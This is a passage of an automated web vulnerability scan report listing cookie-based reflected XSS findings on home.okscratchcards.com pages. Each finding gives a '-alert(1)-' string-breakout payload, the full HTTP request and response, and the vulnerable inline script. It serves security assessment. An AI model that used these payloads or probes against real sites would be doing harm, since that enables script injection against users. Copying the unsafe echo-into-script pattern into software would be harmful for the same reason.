The value of the RegistrationMode cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ce8fc"-alert(1)-"38f2ab8268e was submitted in the RegistrationMode cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /FairPlay.aspx HTTP/1.1
Host: home.okscratchcards.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UniqueVisitorID=0D6B21683BA25FC6246FC1B2BA546DE0; LanguageCode=ENG; __utmz=80613129.1305546061.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); RegistrationMode=PMce8fc"-alert(1)-"38f2ab8268e; CSI_20=EncryptedUniqueVisitorID=0D6B21683BA25FC6246FC1B2BA546DE0&AffiliateID=20&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; BO=FM; __utma=80613129.885970471.1305546061.1305546061.1305546061.1; CountryCode=US; __utmc=80613129; CSITemp=20; ASP.NET_SessionId=bjdz3a55jseldl45htz0ez45; __utmb=80613129.1.10.1305546061;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:17:41 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: RegistrationMode=PMce8fc"-alert(1)-"38f2ab8268e; domain=okscratchcards.com; expires=Fri, 16-May-2014 12:17:41 GMT; path=/
Set-Cookie: BO=FM; domain=okscratchcards.com; expires=Fri, 16-May-2014 12:17:41 GMT; path=/
Set-Cookie: UniqueVisitorID=0D6B21683BA25FC6246FC1B2BA546DE0; domain=okscratchcards.com; expires=Fri, 16-May-2014 12:17:41 GMT; path=/
Set-Cookie: LanguageCode=ENG; domain=okscratchcards.com; expires=Fri, 16-May-2014 12:17:41 GMT; path=/
Set-Cookie: CountryCode=US; domain=okscratchcards.com; expires=Fri, 16-May-2014 12:17:41 GMT; path=/
Set-Cookie: CSITemp=20; domain=okscratchcards.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 36175


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...
nMode, pBonusOption)
           {
            // ** Registration-Mode and Bonus-Option Initialization
            // A. Initialize using the master page parameters (page scope)
            var strRegistrationMode = "PMce8fc"-alert(1)-"38f2ab8268e";
            var strBonusOption = "FM";
            // B. Allow banners to override the page data with their own parameters (banner scope)
            if(typeof(pRegistrationMode)!="undefined" && pRegistration
...[SNIP]...

3.84. http://home.okscratchcards.com/PlayersClub.aspx [BO cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://home.okscratchcards.com
Path:   /PlayersClub.aspx

Issue detail

The value of the BO cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ede9a"-alert(1)-"527fff7e23e was submitted in the BO cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /PlayersClub.aspx HTTP/1.1
Host: home.okscratchcards.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UniqueVisitorID=0D6B21683BA25FC6246FC1B2BA546DE0; LanguageCode=ENG; __utmz=80613129.1305546061.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); RegistrationMode=PM; CSI_20=EncryptedUniqueVisitorID=0D6B21683BA25FC6246FC1B2BA546DE0&AffiliateID=20&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; BO=FMede9a"-alert(1)-"527fff7e23e; __utma=80613129.885970471.1305546061.1305546061.1305546061.1; CountryCode=US; __utmc=80613129; CSITemp=20; ASP.NET_SessionId=bjdz3a55jseldl45htz0ez45; __utmb=80613129.1.10.1305546061;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:18:15 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: RegistrationMode=PM; domain=okscratchcards.com; expires=Fri, 16-May-2014 12:18:15 GMT; path=/
Set-Cookie: BO=FMede9a"-alert(1)-"527fff7e23e; domain=okscratchcards.com; expires=Fri, 16-May-2014 12:18:15 GMT; path=/
Set-Cookie: UniqueVisitorID=0D6B21683BA25FC6246FC1B2BA546DE0; domain=okscratchcards.com; expires=Fri, 16-May-2014 12:18:15 GMT; path=/
Set-Cookie: LanguageCode=ENG; domain=okscratchcards.com; expires=Fri, 16-May-2014 12:18:15 GMT; path=/
Set-Cookie: CountryCode=US; domain=okscratchcards.com; expires=Fri, 16-May-2014 12:18:15 GMT; path=/
Set-Cookie: CSITemp=20; domain=okscratchcards.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 43229


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...
/ ** Registration-Mode and Bonus-Option Initialization
            // A. Initialize using the master page parameters (page scope)
            var strRegistrationMode = "PM";
            var strBonusOption = "FMede9a"-alert(1)-"527fff7e23e";
            // B. Allow banners to override the page data with their own parameters (banner scope)
            if(typeof(pRegistrationMode)!="undefined" && pRegistrationMode!=null){
            strRegistra
...[SNIP]...

3.85. http://home.okscratchcards.com/PlayersClub.aspx [RegistrationMode cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://home.okscratchcards.com
Path:   /PlayersClub.aspx

Issue detail

The value of the RegistrationMode cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a9953"-alert(1)-"b55f2d4f8e was submitted in the RegistrationMode cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /PlayersClub.aspx HTTP/1.1
Host: home.okscratchcards.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UniqueVisitorID=0D6B21683BA25FC6246FC1B2BA546DE0; LanguageCode=ENG; __utmz=80613129.1305546061.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); RegistrationMode=PMa9953"-alert(1)-"b55f2d4f8e; CSI_20=EncryptedUniqueVisitorID=0D6B21683BA25FC6246FC1B2BA546DE0&AffiliateID=20&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; BO=FM; __utma=80613129.885970471.1305546061.1305546061.1305546061.1; CountryCode=US; __utmc=80613129; CSITemp=20; ASP.NET_SessionId=bjdz3a55jseldl45htz0ez45; __utmb=80613129.1.10.1305546061;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:17:07 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: RegistrationMode=PMa9953"-alert(1)-"b55f2d4f8e; domain=okscratchcards.com; expires=Fri, 16-May-2014 12:17:07 GMT; path=/
Set-Cookie: BO=FM; domain=okscratchcards.com; expires=Fri, 16-May-2014 12:17:07 GMT; path=/
Set-Cookie: UniqueVisitorID=0D6B21683BA25FC6246FC1B2BA546DE0; domain=okscratchcards.com; expires=Fri, 16-May-2014 12:17:07 GMT; path=/
Set-Cookie: LanguageCode=ENG; domain=okscratchcards.com; expires=Fri, 16-May-2014 12:17:07 GMT; path=/
Set-Cookie: CountryCode=US; domain=okscratchcards.com; expires=Fri, 16-May-2014 12:17:07 GMT; path=/
Set-Cookie: CSITemp=20; domain=okscratchcards.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 43228


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...
nMode, pBonusOption)
           {
            // ** Registration-Mode and Bonus-Option Initialization
            // A. Initialize using the master page parameters (page scope)
            var strRegistrationMode = "PMa9953"-alert(1)-"b55f2d4f8e";
            var strBonusOption = "FM";
            // B. Allow banners to override the page data with their own parameters (banner scope)
            if(typeof(pRegistrationMode)!="undefined" && pRegistration
...[SNIP]...

3.86. http://home.okscratchcards.com/Promotions.aspx [BO cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://home.okscratchcards.com
Path:   /Promotions.aspx

Issue detail

The value of the BO cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 4f142"-alert(1)-"53426c7c4b6 was submitted in the BO cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Promotions.aspx HTTP/1.1
Host: home.okscratchcards.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UniqueVisitorID=0D6B21683BA25FC6246FC1B2BA546DE0; LanguageCode=ENG; __utmz=80613129.1305546061.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); RegistrationMode=PM; CSI_20=EncryptedUniqueVisitorID=0D6B21683BA25FC6246FC1B2BA546DE0&AffiliateID=20&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; BO=FM4f142"-alert(1)-"53426c7c4b6; __utma=80613129.885970471.1305546061.1305546061.1305546061.1; CountryCode=US; __utmc=80613129; CSITemp=20; ASP.NET_SessionId=bjdz3a55jseldl45htz0ez45; __utmb=80613129.1.10.1305546061;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:17:56 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: RegistrationMode=PM; domain=okscratchcards.com; expires=Fri, 16-May-2014 12:17:56 GMT; path=/
Set-Cookie: BO=FM4f142"-alert(1)-"53426c7c4b6; domain=okscratchcards.com; expires=Fri, 16-May-2014 12:17:56 GMT; path=/
Set-Cookie: UniqueVisitorID=0D6B21683BA25FC6246FC1B2BA546DE0; domain=okscratchcards.com; expires=Fri, 16-May-2014 12:17:56 GMT; path=/
Set-Cookie: LanguageCode=ENG; domain=okscratchcards.com; expires=Fri, 16-May-2014 12:17:56 GMT; path=/
Set-Cookie: CountryCode=US; domain=okscratchcards.com; expires=Fri, 16-May-2014 12:17:56 GMT; path=/
Set-Cookie: CSITemp=20; domain=okscratchcards.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 37529


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...
/ ** Registration-Mode and Bonus-Option Initialization
            // A. Initialize using the master page parameters (page scope)
            var strRegistrationMode = "PM";
            var strBonusOption = "FM4f142"-alert(1)-"53426c7c4b6";
            // B. Allow banners to override the page data with their own parameters (banner scope)
            if(typeof(pRegistrationMode)!="undefined" && pRegistrationMode!=null){
            strRegistra
...[SNIP]...

3.87. http://home.okscratchcards.com/Promotions.aspx [RegistrationMode cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://home.okscratchcards.com
Path:   /Promotions.aspx

Issue detail

The value of the RegistrationMode cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 51939"-alert(1)-"91ead81e5ee was submitted in the RegistrationMode cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Promotions.aspx HTTP/1.1
Host: home.okscratchcards.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UniqueVisitorID=0D6B21683BA25FC6246FC1B2BA546DE0; LanguageCode=ENG; __utmz=80613129.1305546061.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); RegistrationMode=PM51939"-alert(1)-"91ead81e5ee; CSI_20=EncryptedUniqueVisitorID=0D6B21683BA25FC6246FC1B2BA546DE0&AffiliateID=20&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; BO=FM; __utma=80613129.885970471.1305546061.1305546061.1305546061.1; CountryCode=US; __utmc=80613129; CSITemp=20; ASP.NET_SessionId=bjdz3a55jseldl45htz0ez45; __utmb=80613129.1.10.1305546061;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:16:46 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: RegistrationMode=PM51939"-alert(1)-"91ead81e5ee; domain=okscratchcards.com; expires=Fri, 16-May-2014 12:16:46 GMT; path=/
Set-Cookie: BO=FM; domain=okscratchcards.com; expires=Fri, 16-May-2014 12:16:46 GMT; path=/
Set-Cookie: UniqueVisitorID=0D6B21683BA25FC6246FC1B2BA546DE0; domain=okscratchcards.com; expires=Fri, 16-May-2014 12:16:46 GMT; path=/
Set-Cookie: LanguageCode=ENG; domain=okscratchcards.com; expires=Fri, 16-May-2014 12:16:46 GMT; path=/
Set-Cookie: CountryCode=US; domain=okscratchcards.com; expires=Fri, 16-May-2014 12:16:46 GMT; path=/
Set-Cookie: CSITemp=20; domain=okscratchcards.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 37529


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...
nMode, pBonusOption)
           {
            // ** Registration-Mode and Bonus-Option Initialization
            // A. Initialize using the master page parameters (page scope)
            var strRegistrationMode = "PM51939"-alert(1)-"91ead81e5ee";
            var strBonusOption = "FM";
            // B. Allow banners to override the page data with their own parameters (banner scope)
            if(typeof(pRegistrationMode)!="undefined" && pRegistration
...[SNIP]...

3.88. http://home.okscratchcards.com/Responsible.aspx [BO cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://home.okscratchcards.com
Path:   /Responsible.aspx

Issue detail

The value of the BO cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a1ace"-alert(1)-"2c707f54abb was submitted in the BO cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Responsible.aspx HTTP/1.1
Host: home.okscratchcards.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UniqueVisitorID=0D6B21683BA25FC6246FC1B2BA546DE0; LanguageCode=ENG; __utmz=80613129.1305546061.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); RegistrationMode=PM; CSI_20=EncryptedUniqueVisitorID=0D6B21683BA25FC6246FC1B2BA546DE0&AffiliateID=20&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; BO=FMa1ace"-alert(1)-"2c707f54abb; __utma=80613129.885970471.1305546061.1305546061.1305546061.1; CountryCode=US; __utmc=80613129; CSITemp=20; ASP.NET_SessionId=bjdz3a55jseldl45htz0ez45; __utmb=80613129.1.10.1305546061;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:18:49 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: RegistrationMode=PM; domain=okscratchcards.com; expires=Fri, 16-May-2014 12:18:49 GMT; path=/
Set-Cookie: BO=FMa1ace"-alert(1)-"2c707f54abb; domain=okscratchcards.com; expires=Fri, 16-May-2014 12:18:49 GMT; path=/
Set-Cookie: UniqueVisitorID=0D6B21683BA25FC6246FC1B2BA546DE0; domain=okscratchcards.com; expires=Fri, 16-May-2014 12:18:49 GMT; path=/
Set-Cookie: LanguageCode=ENG; domain=okscratchcards.com; expires=Fri, 16-May-2014 12:18:49 GMT; path=/
Set-Cookie: CountryCode=US; domain=okscratchcards.com; expires=Fri, 16-May-2014 12:18:49 GMT; path=/
Set-Cookie: CSITemp=20; domain=okscratchcards.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 40941


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...
/ ** Registration-Mode and Bonus-Option Initialization
            // A. Initialize using the master page parameters (page scope)
            var strRegistrationMode = "PM";
            var strBonusOption = "FMa1ace"-alert(1)-"2c707f54abb";
            // B. Allow banners to override the page data with their own parameters (banner scope)
            if(typeof(pRegistrationMode)!="undefined" && pRegistrationMode!=null){
            strRegistra
...[SNIP]...

3.89. http://home.okscratchcards.com/Responsible.aspx [RegistrationMode cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://home.okscratchcards.com
Path:   /Responsible.aspx

Issue detail

The value of the RegistrationMode cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c84ee"-alert(1)-"d1b4367f894 was submitted in the RegistrationMode cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Responsible.aspx HTTP/1.1
Host: home.okscratchcards.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UniqueVisitorID=0D6B21683BA25FC6246FC1B2BA546DE0; LanguageCode=ENG; __utmz=80613129.1305546061.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); RegistrationMode=PMc84ee"-alert(1)-"d1b4367f894; CSI_20=EncryptedUniqueVisitorID=0D6B21683BA25FC6246FC1B2BA546DE0&AffiliateID=20&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; BO=FM; __utma=80613129.885970471.1305546061.1305546061.1305546061.1; CountryCode=US; __utmc=80613129; CSITemp=20; ASP.NET_SessionId=bjdz3a55jseldl45htz0ez45; __utmb=80613129.1.10.1305546061;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:17:29 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: RegistrationMode=PMc84ee"-alert(1)-"d1b4367f894; domain=okscratchcards.com; expires=Fri, 16-May-2014 12:17:29 GMT; path=/
Set-Cookie: BO=FM; domain=okscratchcards.com; expires=Fri, 16-May-2014 12:17:29 GMT; path=/
Set-Cookie: UniqueVisitorID=0D6B21683BA25FC6246FC1B2BA546DE0; domain=okscratchcards.com; expires=Fri, 16-May-2014 12:17:29 GMT; path=/
Set-Cookie: LanguageCode=ENG; domain=okscratchcards.com; expires=Fri, 16-May-2014 12:17:29 GMT; path=/
Set-Cookie: CountryCode=US; domain=okscratchcards.com; expires=Fri, 16-May-2014 12:17:29 GMT; path=/
Set-Cookie: CSITemp=20; domain=okscratchcards.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 40941


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...
nMode, pBonusOption)
           {
            // ** Registration-Mode and Bonus-Option Initialization
            // A. Initialize using the master page parameters (page scope)
            var strRegistrationMode = "PMc84ee"-alert(1)-"d1b4367f894";
            var strBonusOption = "FM";
            // B. Allow banners to override the page data with their own parameters (banner scope)
            if(typeof(pRegistrationMode)!="undefined" && pRegistration
...[SNIP]...

3.90. http://home.okscratchcards.com/SecurityAndPrivacy.aspx [BO cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://home.okscratchcards.com
Path:   /SecurityAndPrivacy.aspx

Issue detail

The value of the BO cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 2f3ae"-alert(1)-"71c4f817bc was submitted in the BO cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /SecurityAndPrivacy.aspx HTTP/1.1
Host: home.okscratchcards.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UniqueVisitorID=0D6B21683BA25FC6246FC1B2BA546DE0; LanguageCode=ENG; __utmz=80613129.1305546061.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); RegistrationMode=PM; CSI_20=EncryptedUniqueVisitorID=0D6B21683BA25FC6246FC1B2BA546DE0&AffiliateID=20&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; BO=FM2f3ae"-alert(1)-"71c4f817bc; __utma=80613129.885970471.1305546061.1305546061.1305546061.1; CountryCode=US; __utmc=80613129; CSITemp=20; ASP.NET_SessionId=bjdz3a55jseldl45htz0ez45; __utmb=80613129.1.10.1305546061;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:18:47 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: RegistrationMode=PM; domain=okscratchcards.com; expires=Fri, 16-May-2014 12:18:47 GMT; path=/
Set-Cookie: BO=FM2f3ae"-alert(1)-"71c4f817bc; domain=okscratchcards.com; expires=Fri, 16-May-2014 12:18:47 GMT; path=/
Set-Cookie: UniqueVisitorID=0D6B21683BA25FC6246FC1B2BA546DE0; domain=okscratchcards.com; expires=Fri, 16-May-2014 12:18:47 GMT; path=/
Set-Cookie: LanguageCode=ENG; domain=okscratchcards.com; expires=Fri, 16-May-2014 12:18:47 GMT; path=/
Set-Cookie: CountryCode=US; domain=okscratchcards.com; expires=Fri, 16-May-2014 12:18:47 GMT; path=/
Set-Cookie: CSITemp=20; domain=okscratchcards.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 34423


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...
/ ** Registration-Mode and Bonus-Option Initialization
            // A. Initialize using the master page parameters (page scope)
            var strRegistrationMode = "PM";
            var strBonusOption = "FM2f3ae"-alert(1)-"71c4f817bc";
            // B. Allow banners to override the page data with their own parameters (banner scope)
            if(typeof(pRegistrationMode)!="undefined" && pRegistrationMode!=null){
            strRegistra
...[SNIP]...

3.91. http://home.okscratchcards.com/SecurityAndPrivacy.aspx [RegistrationMode cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://home.okscratchcards.com
Path:   /SecurityAndPrivacy.aspx

Issue detail

The value of the RegistrationMode cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b7b33"-alert(1)-"217dc5d8aff was submitted in the RegistrationMode cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /SecurityAndPrivacy.aspx HTTP/1.1
Host: home.okscratchcards.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: UniqueVisitorID=0D6B21683BA25FC6246FC1B2BA546DE0; LanguageCode=ENG; __utmz=80613129.1305546061.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); RegistrationMode=PMb7b33"-alert(1)-"217dc5d8aff; CSI_20=EncryptedUniqueVisitorID=0D6B21683BA25FC6246FC1B2BA546DE0&AffiliateID=20&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; BO=FM; __utma=80613129.885970471.1305546061.1305546061.1305546061.1; CountryCode=US; __utmc=80613129; CSITemp=20; ASP.NET_SessionId=bjdz3a55jseldl45htz0ez45; __utmb=80613129.1.10.1305546061;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:17:26 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: RegistrationMode=PMb7b33"-alert(1)-"217dc5d8aff; domain=okscratchcards.com; expires=Fri, 16-May-2014 12:17:26 GMT; path=/
Set-Cookie: BO=FM; domain=okscratchcards.com; expires=Fri, 16-May-2014 12:17:26 GMT; path=/
Set-Cookie: UniqueVisitorID=0D6B21683BA25FC6246FC1B2BA546DE0; domain=okscratchcards.com; expires=Fri, 16-May-2014 12:17:26 GMT; path=/
Set-Cookie: LanguageCode=ENG; domain=okscratchcards.com; expires=Fri, 16-May-2014 12:17:26 GMT; path=/
Set-Cookie: CountryCode=US; domain=okscratchcards.com; expires=Fri, 16-May-2014 12:17:26 GMT; path=/
Set-Cookie: CSITemp=20; domain=okscratchcards.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 34424


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...
nMode, pBonusOption)
           {
            // ** Registration-Mode and Bonus-Option Initialization
            // A. Initialize using the master page parameters (page scope)
            var strRegistrationMode = "PMb7b33"-alert(1)-"217dc5d8aff";
            var strBonusOption = "FM";
            // B. Allow banners to override the page data with their own parameters (banner scope)
            if(typeof(pRegistrationMode)!="undefined" && pRegistration
